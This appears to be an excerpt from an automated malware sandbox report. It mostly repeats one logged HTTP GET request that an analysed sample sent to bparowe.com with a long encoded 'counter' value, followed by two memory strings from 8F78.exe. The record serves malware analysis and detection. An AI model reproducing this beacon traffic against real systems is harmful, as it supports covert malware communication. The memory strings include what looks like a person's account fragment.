                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <div class="col-sm-1 col-md-1 col-xs-4 mb10"><a href="https://www.facebook.com/pages/%E4%B8%AD%E5%B7%9D%E5%AD%A6%E5%9C%92%E8%AA%BF%E7%90%86%E6%8A%80%E8%A1%93%E5%B0%82%E9%96%80%E5%AD%A6%E6%A0%A1/437759360383530" target="_blank" rel="noopener noreferrer"><img decoding="async" class="img-responsive img_zoom alignnone size-full wp-image-641" src="https://nakacho.com/wp-content/uploads/2020/05/hed_ico_fb.png" alt="Facebook" /></a></div> equals www.facebook.com (Facebook)
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sabrina_hunter@www.facebook.c equals www.facebook.com (Facebook)
